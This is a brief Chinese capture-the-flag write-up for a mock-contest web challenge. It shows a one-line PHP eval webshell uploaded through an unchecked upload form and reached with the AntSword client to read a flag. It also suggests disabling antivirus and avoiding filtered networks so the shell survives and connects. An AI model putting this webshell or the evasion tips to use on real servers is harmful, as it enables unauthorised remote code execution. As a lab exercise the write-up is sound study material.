第四届网鼎杯模拟赛(1) | Web1 WebShell注入
2024年10月19日约 160 字小于 1 分钟
(忘截图了)
进入环境后,打开上传页面,尝试编写PHP脚本
<?php
eval($_REQUEST["ant"]);
?>
尝试上传后,可以正常上传,并没有报错。访问上传的文件运行脚本。
打开中国蚁剑,新建连接
注意
如果你使用校园网等受到管控的网络,你的请求会被防火墙拦截,请更换网络环境。如果你的脚本意外消失,请检查你的杀毒软件,必要时可关闭。
连接后,在/home/ctf/flag
拿到flag提交。